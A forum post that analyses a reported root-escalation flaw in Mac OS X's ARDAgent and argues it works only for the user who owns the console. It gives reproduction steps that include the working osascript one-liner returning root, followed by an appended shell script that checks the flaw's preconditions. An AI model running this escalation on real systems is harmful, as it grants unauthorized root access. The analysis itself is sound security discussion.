Quote:
Originally Posted by Luca
It appears as though entering a simple command in Terminal will grant any user root access, and this vulnerability affects fresh OS X installations right out of the box.
I just want to quote this to boil down my other two posts. As written, this is a gross overstatement (simply because of how it reads). It will only grant root access to:
Quote:
The user who is currently logged in at the console (physical machine).
That could be "any user," yes, but you have to meet a fairly stringent set of requirements to take advantage of this (in the scheme of the remote exploit, security-conscious Internet world). And depending on who's got the console, it may not work even if you have ssh access.
EDIT II: also, if the system is sitting at the Login Window, then nobody can exploit this, since no unprivileged user actually has console access. You can see that /dev/console is owned by root until someone logs in, so you'd need root access to exploit this in that case. In which case it's not much of an exploit.
---
EDIT: Quick steps to verify that I'm not Full Of Crap™:
- Make sure "Remote Login" is enabled in the Sharing preference pane.
- Make sure "Fast User Switching" is enabled in the Accounts preference pane.
- Make sure "Guest Account" is enabled for "Login" in the Accounts preference pane.
- Open Terminal.app, and run the offending command:
Code:
osascript -e \
'tell application "ARDAgent" to do shell script "whoami"'
Which outputs:
Code:
root
- Open a ssh session:
Code:
ssh <user>@localhost
- Run the offending command again. It should succeed, as expected.
- Now, Fast User Switch to the Guest account (this will take a few seconds).
- Open Terminal.app again.
- Open a ssh session again:
Code:
ssh <user>@localhost
- Run the offending command once more. THIS WILL FAIL because Guest now owns the console, not your original user. This will output something akin to:
Code:
_RegisterApplication(), FAILED TO establish the default connection
to the WindowServer, _CGSDefaultConnection() is NULL.
31:55: execution error: ARDAgent got an error: "whoami" doesn’t
understand the do shell script message. (-1708)
---
Sorry for posting in such quick succession; it just really irks me when I see stuff like this that seems poorly researched. For example, the original poster probably has no idea under what conditions said exploit would actually work (simply a "works for me" attitude). And s/he has no idea/notion that Apple may not be able to fix the root cause (at least not in a security update). And the articles I've seen on this are more interested in big publicity and "OMG Mac OS X sEcURiTy HoLeZ" than examining the technical minutiae involved.
Not your fault, Luca. I just thought all of this when it hit Slashdot / elsewhere, but didn't feel like blathering on with technical details to either fanbois or haters that wouldn't care either way. You got the information treasure trove.
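The console-ownership rule the post walks through (logged-in user owns /dev/console, root owns it at the Login Window, Guest owns it after a Fast User Switch) is easy to turn into a quick precondition check. The script below is an added example, not code from the post or from Apple: it predicts the outcome for a given console owner and user, classifies the output of the osascript command into the two results shown above, and, on a real Mac, reads the actual owner of /dev/console. The ARDAgent binary path used for the setuid check is an assumption (the well-known location of the setuid-root ARDAgent executable that makes "do shell script" run as root); the sample failure text is constructed from the post.

```sh
#!/bin/sh
# Added example: predict and classify the ARDAgent "do shell script" trick
# from the console-ownership rule described in the post. Nothing here runs
# the trick itself; it only reads file ownership and mode bits.

# Assumed path of the setuid-root ARDAgent executable (not stated in the post).
ARDAGENT_BIN='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent'

# Owner of /dev/console. macOS stat uses -f %Su, GNU stat uses -c %U.
# Falls back to "root" (the Login Window state) if /dev/console is absent.
console_owner() {
  if [ "$(uname -s)" = Darwin ]; then
    stat -f '%Su' /dev/console
  else
    stat -c '%U' /dev/console 2>/dev/null || echo root
  fi
}

# predict <console_owner> <user>
#   login-window   : root owns the console, nobody is logged in, trick unusable
#   exploitable    : <user> owns the console, ARDAgent will run the script as root
#   wrong-console  : someone else (e.g. Guest after Fast User Switching) owns it
predict() {
  owner=$1
  user=$2
  if [ "$owner" = root ]; then
    echo login-window
  elif [ "$owner" = "$user" ]; then
    echo exploitable
  else
    echo wrong-console
  fi
}

# classify <output of: osascript -e 'tell application "ARDAgent" to do shell script "whoami"'>
#   root       : the script ran as root
#   no-console : ARDAgent could not reach the WindowServer (caller does not own the console)
#   other      : anything else (e.g. ARDAgent no longer setuid, different error)
classify() {
  case "$1" in
    root) echo root ;;
    *"_CGSDefaultConnection() is NULL"*) echo no-console ;;
    *) echo other ;;
  esac
}

# True if the ARDAgent binary exists and carries the setuid bit.
ardagent_is_setuid() {
  [ -u "$ARDAGENT_BIN" ]
}

# Constructed sample of the failure output quoted in the post.
SAMPLE_FAILURE='_RegisterApplication(), FAILED TO establish the default connection
to the WindowServer, _CGSDefaultConnection() is NULL.
31:55: execution error: ARDAgent got an error: "whoami" doesn'"'"'t
understand the do shell script message. (-1708)'

# Report for the machine this runs on (only meaningful on a Mac).
run_check() {
  me=$(id -un)
  owner=$(console_owner)
  if ardagent_is_setuid; then suid=setuid; else suid=not-setuid; fi
  echo "user=$me console_owner=$owner ardagent=$suid outcome=$(predict "$owner" "$me")"
}

if [ "${1:-}" = --check ]; then
  run_check
fi
```

Run it with `sh check_ardagent.sh --check` on the Mac under test; "exploitable" plus "setuid" reproduces the conditions of the post's first two steps, while "wrong-console" corresponds to the Fast User Switch step where the osascript call fails.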